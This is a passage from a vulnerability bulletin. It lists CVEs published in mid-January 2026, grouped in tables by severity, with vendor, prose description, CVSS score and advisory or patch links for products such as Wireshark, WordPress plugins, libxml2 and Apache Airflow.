| WeblateOrg--wlc | wlc is a Weblate command-line client using Weblate's REST API. Prior to 1.17.0, wlc supported providing unscoped API keys in the setting. This practice was discouraged for years, but the code was never removed. This might cause the API key to be leaked to different servers. | 2026-01-12 | 5.3 | CVE-2026-22251 | https://github.com/WeblateOrg/wlc/security/advisories/GHSA-9rp8-h4g8-8766 https://github.com/WeblateOrg/wlc/pull/1098 https://github.com/WeblateOrg/wlc/commit/aafdb507a9e66574ade1f68c50c4fe75dbe80797 |
| Wireshark Foundation--Wireshark | IEEE 802.11 protocol dissector crash in Wireshark 4.6.0 to 4.6.2 and 4.4.0 to 4.4.12 allows denial of service | 2026-01-14 | 5.3 | CVE-2026-0959 | https://www.wireshark.org/security/wnpa-sec-2026-02.html GitLab Issue #20939 |
| Wireshark Foundation--Wireshark | BLF file parser crash in Wireshark 4.6.0 to 4.6.2 and 4.4.0 to 4.4.12 allows denial of service | 2026-01-14 | 5.5 | CVE-2026-0961 | https://www.wireshark.org/security/wnpa-sec-2026-01.html GitLab Issue #20880 |
| Wireshark Foundation--Wireshark | SOME/IP-SD protocol dissector crash in Wireshark 4.6.0 to 4.6.2 and 4.4.0 to 4.4.12 allows denial of service | 2026-01-14 | 5.3 | CVE-2026-0962 | https://www.wireshark.org/security/wnpa-sec-2026-03.html GitLab Issue #20945 |
| Wireshark Foundation--Wireshark | HTTP3 protocol dissector infinite loop in Wireshark 4.6.0 to 4.6.2 allows denial of service | 2026-01-14 | 4.7 | CVE-2026-0960 | https://www.wireshark.org/security/wnpa-sec-2026-04.html GitLab Issue #20944 |
| wpcenter--AffiliateX Amazon Affiliate Plugin | The AffiliateX - Amazon Affiliate Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_customization_settings AJAX action in versions 1.0.0 to 1.3.9.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to store arbitrary JavaScript that executes whenever an AffiliateX block renders on the site. | 2026-01-15 | 6.4 | CVE-2025-13859 | https://www.wordfence.com/threat-intel/vulnerabilities/id/36d57b8d-7e62-413b-8ea9-87963b8cd469?source=cve https://plugins.trac.wordpress.org/changeset/3420957/affiliatex/trunk/includes/functions/AjaxFunctions.php https://plugins.trac.wordpress.org/changeset/3420957/affiliatex/trunk/includes/helpers/class-affiliatex-helpers.php |
| wpchill--Filr Secure document library | The Filr - Secure document library plugin for WordPress is vulnerable to Stored Cross-Site Scripting via unrestricted file upload in all versions up to, and including, 1.2.11 due to insufficient file type restrictions in the FILR_Uploader class. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload malicious HTML files containing JavaScript that will execute whenever a user accesses the uploaded file, provided they have permission to create or edit posts with the 'filr' post type. | 2026-01-17 | 4.4 | CVE-2025-14632 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c16c3a8d-bae1-4729-86c8-ec13481ff187?source=cve https://plugins.trac.wordpress.org/browser/filr-protection/trunk/src/class-filr-uploader.php#L14 https://plugins.trac.wordpress.org/browser/filr-protection/tags/1.2.10/src/class-filr-uploader.php#L14 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3425333%40filr-protection&new=3425333%40filr-protection&sfp_email=&sfph_mail= |
| wpdevelop--Booking Calendar | The Booking Calendar plugin for WordPress is vulnerable to Missing Authorization leading to Sensitive Information Exposure in all versions up to, and including, 10.14.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view all booking records in the database, including personally identifiable information (PII) such as names, email addresses, phone numbers, physical addresses, payment status, booking costs, and booking hashes belonging to other users. | 2026-01-16 | 4.3 | CVE-2025-14982 | https://www.wordfence.com/threat-intel/vulnerabilities/id/161d92e3-d255-4967-9449-be263a46bec8?source=cve https://plugins.trac.wordpress.org/browser/booking/trunk/includes/page-bookings/bookings__listing.php#L150 https://plugins.trac.wordpress.org/browser/booking/trunk/includes/page-bookings/bookings__sql.php#L722 https://plugins.trac.wordpress.org/browser/booking/trunk/includes/page-bookings/bookings__sql.php#L918 https://plugins.trac.wordpress.org/browser/booking/trunk/includes/page-bookings/bookings__listing.php#L158 https://plugins.trac.wordpress.org/browser/booking/trunk/core/wpbc-activation.php#L661 https://plugins.trac.wordpress.org/browser/booking/trunk/core/any/class-admin-menu.php#L22 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3432649%40booking%2Ftrunk&old=3416518%40booking%2Ftrunk&sfp_email=&sfph_mail= https://plugins.trac.wordpress.org/changeset?old_path=%2Fbooking&old=3436482&new_path=%2Fbooking&new=3436482&sfp_email=&sfph_mail= |
| wpdevteam--Essential Addons for Elementor Popular Elementor Templates & Widgets | The Essential Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to and including 6.5.5 via the 'eael_product_quickview_popup' function. This makes it possible for unauthenticated attackers to retrieve WooCommerce product information for products with draft, pending, or private status, which should normally be restricted. | 2026-01-16 | 5.3 | CVE-2026-1004 | https://www.wordfence.com/threat-intel/vulnerabilities/id/06ef9a21-e2b9-40c7-9de5-cff175fa10a5?source=cve https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/trunk/includes/Traits/Ajax_Handler.php#L820 https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/trunk/includes/Traits/Ajax_Handler.php#L64 https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/trunk/includes/Traits/Ajax_Handler.php#L65 https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/trunk/includes/Traits/Ajax_Handler.php#L832 https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/trunk/includes/Traits/Ajax_Handler.php#L1439 https://github.com/WPDevelopers/essential-addons-for-elementor-lite/commit/4e43db06bcf12870cc3b185ed59b3fe2cd227945 |
| wpswings--Wallet System for WooCommerce Digital Wallet, Buy Now Pay Later (BNPL), Instant Cashback, Referral program, Partial & Subscription Payments | The Wallet System for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'change_wallet_fund_request_status_callback' function in all versions up to, and including, 2.7.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to manipulate wallet withdrawal requests and arbitrarily increase their wallet balance or decrease other users' balances. | 2026-01-17 | 6.5 | CVE-2025-14450 | https://www.wordfence.com/threat-intel/vulnerabilities/id/466a5315-fc05-4b96-9dfd-17862fc406c5?source=cve https://plugins.trac.wordpress.org/browser/wallet-system-for-woocommerce/trunk/includes/class-wallet-system-ajaxhandler.php#L140 https://plugins.trac.wordpress.org/browser/wallet-system-for-woocommerce/tags/2.7.2/includes/class-wallet-system-ajaxhandler.php#L140 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3435898%40wallet-system-for-woocommerce&new=3435898%40wallet-system-for-woocommerce&sfp_email=&sfph_mail= |
| xiweicheng--TMS | A vulnerability was detected in xiweicheng TMS up to 2.28.0. Affected by this issue is the function Upload of the file src/main/java/com/lhjz/portal/controller/FileController.java. The manipulation of the argument filename results in unrestricted upload. The attack may be performed from remote. The exploit is now public and may be used. | 2026-01-17 | 6.3 | CVE-2026-1061 | VDB-341629 (xiweicheng TMS FileController.java upload unrestricted upload); CTI Indicators (IOB, IOC, TTP, IOA); Submit #731240 (https://gitee.com/xiweicheng/tms/ Merchant Mall - Mall Development/TMS 1.0 Unrestricted Upload); https://github.com/bkglfpp/CVE-md/blob/main/%E5%95%86%E6%88%B7%E5%95%86%E5%9F%8E%E2%80%94%E5%95%86%E5%9F%8E%E5%BC%80%E5%8F%91tms/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.md |
| xiweicheng--TMS | A flaw has been found in xiweicheng TMS up to 2.28.0. This affects the function Summary of the file src/main/java/com/lhjz/portal/util/HtmlUtil.java. This manipulation of the argument url causes server-side request forgery. It is possible to initiate the attack remotely. The exploit has been published and may be used. | 2026-01-17 | 6.3 | CVE-2026-1062 | VDB-341630 (xiweicheng TMS HtmlUtil.java summary server-side request forgery); CTI Indicators (IOB, IOC, IOA); Submit #731241 (https://gitee.com/xiweicheng/tms/ Merchant Mall - Mall Development/TMS 1.0 Server-Side Request Forgery); Submit #731242 (https://gitee.com/xiweicheng/tms/ Merchant Mall - Mall Development/TMS 1.0 Server-Side Request Forgery (Duplicate)); https://github.com/bkglfpp/CVE-md/blob/main/%E5%95%86%E6%88%B7%E5%95%86%E5%9F%8E%E2%80%94%E5%95%86%E5%9F%8E%E5%BC%80%E5%8F%91tms/SSRF%EF%BC%881%EF%BC%89.md https://github.com/bkglfpp/CVE-md/blob/main/%E5%95%86%E6%88%B7%E5%95%86%E5%9F%8E%E2%80%94%E5%95%86%E5%9F%8E%E5%BC%80%E5%8F%91tms/SSRF%EF%BC%882%EF%BC%89.md |
| Xmind--Xmind | Xmind 2020 contains a cross-site scripting vulnerability that allows attackers to inject malicious payloads into mind mapping files or custom headers. Attackers can craft malicious files with embedded JavaScript that execute system commands when opened, enabling remote code execution through mouse interactions or file opening. | 2026-01-16 | 6.1 | CVE-2021-47844 | ExploitDB-49827 Official Xmind Product Homepage Proof of Concept Video VulnCheck Advisory: Xmind 2020 - Persistent Cross-Site Scripting |
| YouPHPTube--YouPHPTube | YouPHPTube <= 7.8 contains a local file inclusion vulnerability that allows unauthenticated attackers to access arbitrary files by manipulating the 'lang' parameter in GET requests. Attackers can exploit the path traversal flaw in locale/function.php to include and view PHP files outside the intended directory by using directory traversal sequences. | 2026-01-13 | 6.2 | CVE-2021-47749 | ExploitDB-51101 Archived YouPHPTube Homepage VulnCheck Advisory: YouPHPTube <= 7.8 - Directory Traversal |
| YouPHPTube--YouPHPTube | YouPHPTube <= 7.8 contains a cross-site scripting vulnerability that allows attackers to inject malicious scripts through the redirectUri parameter in the signup page. Attackers can craft special signup URLs with embedded script tags to execute arbitrary JavaScript in victims' browsers when they access the signup page. | 2026-01-13 | 6.1 | CVE-2021-47750 | ExploitDB-51101 Archived YouPHPTube Homepage VulnCheck Advisory: YouPHPTube <= 7.8 - Cross-Site Scripting |
| zealopensource--User Registration Using Contact Form 7 | The User Registration Using Contact Form 7 plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_cf7_form_data' function in all versions up to, and including, 2.5. This makes it possible for unauthenticated attackers to retrieve form settings which includes Facebook app secrets. | 2026-01-17 | 5.3 | CVE-2025-12825 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b49978c1-9254-4229-8d32-e12896301f3d?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3433276%40user-registration-using-contact-form-7&new=3433276%40user-registration-using-contact-form-7&sfp_email=&sfph_mail= |
| Zippy--Zstore | Zstore, now referred to as Zippy CRM, 6.5.4 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts through unvalidated input parameters. Attackers can submit crafted payloads in manual insertion points to execute arbitrary JavaScript code in victim's browser context. | 2026-01-13 | 6.1 | CVE-2023-53985 | ExploitDB-51207 Zstore/Zippy-CRM Product Homepage Zstore/Zippy-CRM GitHub Repository Vulnerability Reproduction Repository VulnCheck Advisory: Zstore 6.5.4 - Reflected Cross-Site Scripting (XSS) |
| zitadel--zitadel | ZITADEL is an open source identity management platform. Prior to 4.9.1 and 3.4.6, a user enumeration vulnerability has been discovered in Zitadel's login interfaces. An unauthenticated attacker can exploit this flaw to confirm the existence of valid user accounts by iterating through usernames and userIDs. This vulnerability is fixed in 4.9.1 and 3.4.6. | 2026-01-15 | 5.3 | CVE-2026-23511 | https://github.com/zitadel/zitadel/security/advisories/GHSA-pvm5-9frx-264r https://github.com/zitadel/zitadel/commit/b85ab69e4679b0268e2b0e9b4cd04e934af10dd2 https://github.com/zitadel/zitadel/commit/c300d4cc6a2775ab17ddfe76492f24170f8b858d https://github.com/zitadel/zitadel/releases/tag/v3.4.6 https://github.com/zitadel/zitadel/releases/tag/v4.9.1 |
| Zohocorp--ManageEngine ADManager Plus | Zohocorp ManageEngine ADManager Plus versions below 7230 are vulnerable to Path Traversal in the User Management module | 2026-01-13 | 5.5 | CVE-2025-9435 | https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2025-9435.html |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| andy_moyle--Church Admin | The Church Admin plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.0.28 due to insufficient validation of user-supplied URLs in the 'audio_url' parameter. This makes it possible for authenticated attackers, with Administrator-level access, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2026-01-17 | 2.2 | CVE-2026-0682 | https://www.wordfence.com/threat-intel/vulnerabilities/id/77227fc5-7c38-476d-af4c-4b2ad3dd8420?source=cve https://plugins.trac.wordpress.org/browser/church-admin/trunk/includes/sermon-podcast.php#L1181 https://plugins.trac.wordpress.org/browser/church-admin/tags/5.0.27/includes/sermon-podcast.php#L1181 https://plugins.trac.wordpress.org/browser/church-admin/trunk/includes/functions.php#L6297 https://plugins.trac.wordpress.org/browser/church-admin/tags/5.0.27/includes/functions.php#L6297 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3440847%40church-admin&new=3440847%40church-admin&sfp_email=&sfph_mail= |
| bestpractical--Request Tracker | Best Practical Request Tracker (RT) before 4.4.9, 5.0.9, and 6.0.2 allows CSV Injection via ticket values when TSV export is used. | 2026-01-16 | 2.6 | CVE-2025-61873 | https://docs.bestpractical.com/release-notes/rt/index.html |
| Fortinet--FortiSandbox | A Server-Side Request Forgery (SSRF) vulnerability [CWE-918] in Fortinet FortiSandbox 5.0.0 through 5.0.4, FortiSandbox 4.4 all versions, FortiSandbox 4.2 all versions, FortiSandbox 4.0 all versions may allow an authenticated attacker to proxy internal requests, limited to plaintext endpoints only, via crafted HTTP requests. | 2026-01-13 | 3.4 | CVE-2025-67685 | https://fortiguard.fortinet.com/psirt/FG-IR-25-783 |
| glenwpcoder--Drag and Drop Multiple File Upload for Contact Form 7 | The Drag and Drop Multiple File Upload for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing ownership check in the dnd_codedropz_upload_delete() function in all versions up to, and including, 1.3.9.2. This makes it possible for unauthenticated attackers to delete arbitrary uploaded files when the "Send attachments as links" setting is enabled. | 2026-01-15 | 3.7 | CVE-2025-14457 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1a182243-b24a-4c46-8b65-6b38d8509a51?source=cve https://plugins.trac.wordpress.org/changeset/3428236/drag-and-drop-multiple-file-upload-contact-form-7 |
| Lenovo--Tab M11 TB330FU TB330XU | A potential missing authentication vulnerability was reported in some Lenovo Tablets that could allow an unauthorized user with physical access to modify Control Center settings if the device is locked when the "Allow Control Center access when locked" option is disabled. | 2026-01-14 | 3.2 | CVE-2025-14058 | https://support.lenovo.com/us/en/product_security/LEN-207951 |
| Mattermost--Mattermost | Mattermost versions 10.11.x <= 10.11.8 fail to validate input size before processing hashtags, which allows an authenticated attacker to exhaust CPU resources via a single HTTP request containing a post with thousands of space-separated tokens. | 2026-01-16 | 3.1 | CVE-2025-14822 | https://mattermost.com/security-updates |
| n/a--LigeroSmart | A weakness has been identified in LigeroSmart up to 6.1.26. Impacted is an unknown function of the file /otrs/index.pl?Action=AgentTicketZoom. This manipulation of the argument TicketID causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-17 | 3.5 | CVE-2026-1048 | VDB-341600 (LigeroSmart index.pl cross site scripting); CTI Indicators (IOB, IOC, TTP, IOA); Submit #729399 (LigeroSmart 6.1.26 Cross Site Scripting); https://github.com/LigeroSmart/ligerosmart/issues/279 https://github.com/LigeroSmart/ligerosmart/issues/279#issue-3775562926 |
| n/a--LigeroSmart | A security vulnerability has been detected in LigeroSmart up to 6.1.26. The affected element is an unknown function of the file /otrs/index.pl. Such manipulation of the argument TicketID leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-17 | 3.5 | CVE-2026-1049 | VDB-341601 (LigeroSmart index.pl cross site scripting); CTI Indicators (IOB, IOC, TTP, IOA); Submit #729402 (LigeroSmart 6.1.26 Cross Site Scripting); https://github.com/LigeroSmart/ligerosmart/issues/280 https://github.com/LigeroSmart/ligerosmart/issues/280#issue-3776580352 |
| nicbarker--clay | A security flaw has been discovered in nicbarker clay up to 0.14. This affects the function Clay__MeasureTextCached in the library clay.h. The manipulation results in null pointer dereference. The attack is only possible with local access. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-18 | 3.3 | CVE-2025-15535 | VDB-341707 (nicbarker clay clay.h Clay__MeasureTextCached null pointer dereference); CTI Indicators (IOB, IOC, IOA); Submit #733346 (nicbarker clay v0.14 and master-branch Memory Corruption); https://github.com/nicbarker/clay/issues/566 https://github.com/oneafter/1215/blob/main/repro |
| nodejs--undici | Undici is an HTTP/1.1 client for Node.js. Prior to 7.18.0 and 6.23.0, the number of links in the decompression chain is unbounded, and the default maxHeaderSize allows a malicious server to insert thousands of compression steps, leading to high CPU usage and excessive memory allocation. This vulnerability is fixed in 7.18.0 and 6.23.0. | 2026-01-14 | 3.7 | CVE-2026-22036 | https://github.com/nodejs/undici/security/advisories/GHSA-g9mf-h72j-4rw9 https://github.com/nodejs/undici/commit/b04e3cbb569c1596f86c108e9b52c79d8475dcb3 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. This improper input validation vulnerability occurs because Keycloak accepts RFC-compliant matrix parameters in URL path segments, while common reverse proxy configurations may ignore or mishandle them. A remote attacker can craft requests to mask path segments, potentially bypassing proxy-level path filtering. This could expose administrative or sensitive endpoints that operators believe are not externally reachable. | 2026-01-15 | 3.7 | CVE-2026-0976 | https://access.redhat.com/security/cve/CVE-2026-0976 RHBZ#2429869 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was identified in the RelaxNG parser of libxml2 related to how external schema inclusions are handled. The parser does not enforce a limit on inclusion depth when resolving nested <include> directives. Specially crafted or overly complex schemas can cause excessive recursion during parsing. This may lead to stack exhaustion and application crashes, creating a denial-of-service risk. | 2026-01-15 | 3.7 | CVE-2026-0989 | https://access.redhat.com/security/cve/CVE-2026-0989 RHBZ#2429933 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in the libxml2 library. This uncontrolled resource consumption vulnerability occurs when processing XML catalogs that contain repeated <nextCatalog> elements pointing to the same downstream catalog. A remote attacker can exploit this by supplying crafted catalogs, causing the parser to redundantly traverse catalog chains. This leads to excessive CPU consumption and degrades application availability, resulting in a denial-of-service condition. | 2026-01-15 | 2.9 | CVE-2026-0992 | https://access.redhat.com/security/cve/CVE-2026-0992 RHBZ#2429975 |
| SAP_SE--NW AS Java UME User Mapping | The User Management Engine (UME) in NetWeaver Application Server for Java (NW AS Java) utilizes an obsolete cryptographic algorithm for encrypting User Mapping data. This weakness could allow an attacker with high-privileged access to exploit the vulnerability under specific conditions, potentially leading to partial disclosure of sensitive information. This has low impact on confidentiality with no impact on integrity and availability of the application. | 2026-01-13 | 3 | CVE-2026-0510 | https://me.sap.com/notes/3593356 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP Identity Management | Due to insufficient input handling, the SAP Identity Management REST interface allows an authenticated administrator to submit specially crafted malicious REST requests that are processed by JNDI operations without adequate input neutralization. This may lead to limited disclosure or modification of data, resulting in low impact on confidentiality and integrity, with no impact on application availability. | 2026-01-13 | 3.8 | CVE-2026-0504 | https://me.sap.com/notes/3657998 https://url.sap/sapsecuritypatchday |
| SICK AG--TDC-X401GL | An attacker with administrative access may inject malicious content into the login page, potentially enabling cross-site scripting (XSS) attacks, leading to the extraction of sensitive data. | 2026-01-15 | 3.8 | CVE-2026-22919 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| SICK AG--TDC-X401GL | The device's passwords have not been adequately salted, making them vulnerable to password extraction attacks. | 2026-01-15 | 3.7 | CVE-2026-22920 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| THM-Health--PILOS | PILOS (Platform for Interactive Live-Online Seminars) is a frontend for BigBlueButton. Prior to 4.10.0, Cross-Site Request Forgery (CSRF) vulnerability exists in an administrative API endpoint responsible for terminating all active video conferences on a single server. The affected endpoint performs a destructive action but is exposed via an HTTP GET request. Although proper authorization checks are enforced and the endpoint cannot be triggered cross-site, the use of GET allows the action to be implicitly invoked through same-site content (e.g. embedded resources rendered within the application). As a result, an authenticated administrator who views crafted content within the application may unknowingly trigger the endpoint, causing all active video conferences on the server to be terminated without explicit intent or confirmation. This vulnerability is fixed in 4.10.0. | 2026-01-12 | 2.4 | CVE-2026-22800 | https://github.com/THM-Health/PILOS/security/advisories/GHSA-r24c-9p4j-rqw9 https://github.com/THM-Health/PILOS/commit/d9ab9bb7ac0a8581c25e24cb7db2152d40be4d1b |
| WeblateOrg--wlc | wlc is a Weblate command-line client using Weblate's REST API. Prior to 1.17.0, the SSL verification would be skipped for some crafted URLs. This vulnerability is fixed in 1.17.0. | 2026-01-12 | 2.5 | CVE-2026-22250 | https://github.com/WeblateOrg/wlc/security/advisories/GHSA-2mmv-7rrp-g8xh https://github.com/WeblateOrg/wlc/pull/1097 https://github.com/WeblateOrg/wlc/commit/a513864ec4daad00146e6d6e039559726e256fa3 |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| AbhishekMali21--AbhishekMali21 | Multiple SQL Injection vulnerabilities exist in AbhishekMali21 GYM-MANAGEMENT-SYSTEM 1.0 via the 'name' parameter in (1) member_search.php, (2) trainer_search.php, and (3) gym_search.php, and via the 'id' parameter in (4) payment_search.php. An unauthenticated remote attacker can exploit these issues to inject malicious SQL commands, leading to unauthorized data extraction, authentication bypass, or modification of database contents. | 2026-01-12 | not yet calculated | CVE-2025-67146 | https://github.com/AbhishekMali21/GYM-MANAGEMENT-SYSTEM/issues/4 |
| AbhishekMali21--AbhishekMali21 | Multiple SQL Injection vulnerabilities exist in amansuryawanshi Gym-Management-System-PHP 1.0 via the 'name', 'email', and 'comment' parameters in (1) submit_contact.php, the 'username' and 'pass_key' parameters in (2) secure_login.php, and the 'login_id', 'pwfield', and 'login_key' parameters in (3) change_s_pwd.php. An unauthenticated or authenticated attacker can exploit these issues to bypass authentication, execute arbitrary SQL commands, modify database records, delete data, or escalate privileges to administrator level. | 2026-01-12 | not yet calculated | CVE-2025-67147 | https://github.com/amansuryawanshi/Gym-Management-System-PHP/issues/3 |
| Absolute Security--Secure Access | CVE-2026-0517 is a denial-of-service vulnerability in versions of Secure Access Server prior to 14.20. An attacker can send a specially crafted packet to a server and cause the server to crash. | 2026-01-17 | not yet calculated | CVE-2026-0517 | https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2026-0517 |
| Absolute Security--Secure Access | CVE-2026-0518 is a cross-site scripting vulnerability in versions of Secure Access prior to 14.20. An attacker with administrative privileges can interfere with another administrator's use of the console. | 2026-01-17 | not yet calculated | CVE-2026-0518 | https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2026-0518 |
| Absolute Security--Secure Access | In Secure Access 12.70 and prior to 14.20, the logging subsystem may write an unredacted authentication token to logs under certain configurations. Any party with access to those logs could read the token and reuse it to access an integrated system. | 2026-01-17 | not yet calculated | CVE-2026-0519 | https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2026-0519 |
| Acora--Acora | A static password reset token in the password reset function of DDSN Interactive Acora CMS v10.7.1 allows attackers to arbitrarily reset the user password and execute a full account takeover via a replay attack. | 2026-01-12 | not yet calculated | CVE-2025-63314 | http://ddsn.com http://acora.com https://github.com/padayali-JD/CVE-2025-63314 |
| adonisjs--lucid | @adonisjs/lucid is an SQL ORM for AdonisJS built on top of Knex. Prior to 21.8.2 and 22.0.0-next.6, there is a Mass Assignment vulnerability in AdonisJS Lucid which may allow a remote attacker who can influence data that is passed into Lucid model assignments to overwrite the internal ORM state. This may lead to logic bypasses and unauthorized record modification within a table or model. This affects @adonisjs/lucid through version 21.8.1 and 22.x pre-release versions prior to 22.0.0-next.6. This has been patched in @adonisjs/lucid versions 21.8.2 and 22.0.0-next.6. | 2026-01-13 | not yet calculated | CVE-2026-22814 | https://github.com/adonisjs/lucid/security/advisories/GHSA-g5gc-h5hp-555f |
| Airth--Airth | An issue in AIRTH SMART HOME AQI MONITOR Bootloader v.1.005 allows a physically proximate attacker to obtain sensitive information via the UART port of the BK7231N controller (Wi-Fi and BLE module), which is left open to access on the device. | 2026-01-14 | not yet calculated | CVE-2025-67399 | http://airth.com https://github.com/rupeshsurve04/CVE-2025-67399/blob/main/AIRTH_SMART_HOME_AQI_MONITOR_CVE-2025-67399.pdf |
| akinloluwami--outray | Outray is an open-source ngrok alternative. Prior to 0.1.5, a TOCTOU race condition vulnerability allows a user to exceed the set number of active tunnels in their subscription plan. This vulnerability is fixed in 0.1.5. | 2026-01-14 | not yet calculated | CVE-2026-22820 | https://github.com/outray-tunnel/outray/security/advisories/GHSA-3pqc-836w-jgr7 https://github.com/outray-tunnel/outray/commit/08c61495761349e7fd2965229c3faa8d7b1c1581 |
| alextselegidis--easyappointments | Easy!Appointments is a self hosted appointment scheduler. In 1.5.2 and earlier, application/core/EA_Security.php::csrf_verify() only enforces CSRF for POST requests and returns early for non-POST methods. Several application endpoints perform state-changing operations while accepting parameters from GET (or $_REQUEST), so an attacker can perform CSRF by forcing a victim's browser to issue a crafted GET request. Impact: creation of admin accounts, modification of admin email/password, and full admin account takeover. | 2026-01-15 | not yet calculated | CVE-2026-23622 | https://github.com/alextselegidis/easyappointments/security/advisories/GHSA-54v4-4685-vwrj |
| AltumCode--AltumCode | Cross Site Scripting vulnerability in 66biolinks by AltumCode v.61.0.1 allows an attacker to execute arbitrary code via a crafted favicon file | 2026-01-12 | not yet calculated | CVE-2025-66939 | https://66biolinks.com/ https://gist.github.com/Waqar-Arain/2a21b135a04e7804c124688ea1085875 |
| AMD--AMD EPYC 9004 Series Processors | A write-what-where condition within AMD CPUs may allow an admin-privileged attacker to modify the configuration of the CPU pipeline, potentially resulting in the corruption of the stack pointer inside an SEV-SNP guest. | 2026-01-16 | not yet calculated | CVE-2025-29943 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-3027.html |
| anomalyco--opencode | OpenCode is an open source AI coding agent. The markdown renderer used for LLM responses will insert arbitrary HTML into the DOM. There is no sanitization with DOMPurify or even a CSP on the web interface to prevent JavaScript execution via HTML injection. This means controlling the LLM response for a chat session gets JavaScript execution on the http://localhost:4096 origin. This vulnerability is fixed in 1.1.10. | 2026-01-12 | not yet calculated | CVE-2026-22813 | https://github.com/anomalyco/opencode/security/advisories/GHSA-c83v-7274-4vgp |
| Anycomment--Anycomment | Cross Site Scripting vulnerability in Anycomment anycomment.io 0.4.4 allows a remote attacker to execute arbitrary code via the Anycomment comment section | 2026-01-15 | not yet calculated | CVE-2025-67025 | https://bdu.fstec.ru/vul/2023-08900 https://anycomment.io/site/changelog |
| Apache Software Foundation--Apache Airflow | In Apache Airflow versions before 3.1.6, when rendered template fields in a Dag exceed [core] max_templated_field_length, sensitive values could be exposed in cleartext in the Rendered Templates UI. This occurred because serialization of those fields used a secrets masker instance that did not include user-registered mask_secret() patterns, so secrets were not reliably masked before truncation and display. Users are recommended to upgrade to 3.1.6 or later, which fixes this issue. | 2026-01-16 | not yet calculated | CVE-2025-68438 | https://lists.apache.org/thread/55n7b4nlsz3vo5n4h5lrj9bfsk8ctyff |
| Apache Software Foundation--Apache Airflow | In Apache Airflow versions before 3.1.6, the proxies and proxy fields within a Connection may include proxy URLs containing embedded authentication information. These fields were not treated as sensitive by default and therefore were not automatically masked in log output. As a result, when such connections are rendered or printed to logs, proxy credentials embedded in these fields could be exposed. Users are recommended to upgrade to 3.1.6 or later, which fixes this issue. | 2026-01-16 | not yet calculated | CVE-2025-68675 | https://lists.apache.org/thread/x6kply4nqd4vc4wgxtm6g9r2tt63s8c5 |
| Apache Software Foundation--Apache bRPC | Remote command injection vulnerability in the heap profiler built-in service in Apache bRPC (all versions < 1.15.0) on all platforms allows an attacker to inject remote commands. Root Cause: The bRPC heap profiler built-in service (/pprof/heap) does not validate the user-provided extra_options parameter and executes it as a command-line argument. Attackers can execute remote commands using the extra_options parameter. Affected scenarios: Use of the built-in bRPC heap profiler service to perform jemalloc memory profiling. How to Fix: choose one of the following two methods: 1. Upgrade bRPC to version 1.15.0. 2. Apply this patch ( https://github.com/apache/brpc/pull/3101 ) manually. | 2026-01-16 | not yet calculated | CVE-2025-60021 | https://lists.apache.org/thread/xy51d2fx6drzhfp92xptsx5845q7b37m |
| Apache Software Foundation--Apache Camel Neo4j | Cypher Injection vulnerability in Apache Camel camel-neo4j component. This issue affects Apache Camel: from 4.10.0 before 4.10.8, from 4.14.0 before 4.14.3, from 4.15.0 before 4.17.0. Users are recommended to upgrade to version 4.10.8 for 4.10.x LTS, 4.14.3 for 4.14.x LTS, and 4.17.0. | 2026-01-14 | not yet calculated | CVE-2025-66169 | https://camel.apache.org/security/CVE-2025-66169.html |
